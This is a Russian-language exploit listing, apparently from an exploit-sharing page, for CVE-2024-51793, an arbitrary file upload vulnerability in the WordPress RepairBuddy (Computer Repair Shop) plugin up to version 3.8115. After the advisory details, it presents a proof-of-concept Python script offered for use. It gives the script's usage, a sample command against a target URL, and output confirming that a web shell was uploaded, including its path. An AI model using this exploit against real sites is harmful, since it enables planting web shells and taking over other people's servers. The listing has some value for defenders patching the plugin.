
Плагин RepairBuddy для WordPress <= 3.8115 - Уязвимость произвольной загрузки файлов
CVE-ID: CVE-2024-51793
Опубликован: 2024-11-11
Обновлён: 2024-11-11
Название: Уязвимость произвольной загрузки файлов в плагине WordPress RepairBuddy <= 3.8115
Описание:
Уязвимость неограниченной загрузки файлов опасного типа в Webful Creations Computer Repair Shop позволяет загрузить веб-шелл на веб-сервер. Эта проблема затрагивает Computer Repair Shop: версии с n/a по 3.8115.
CWE:
CVSS:
Это доказательство концепции эксплойта для уязвимости произвольной загрузки файлов в плагине WordPress RepairBuddy версий <= 3.8115. Эксплойт позволяет злоумышленнику загрузить веб-шелл на уязвимый сервер.
requests (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
Эксплойт создан: Nxploited, Khaled Alenazi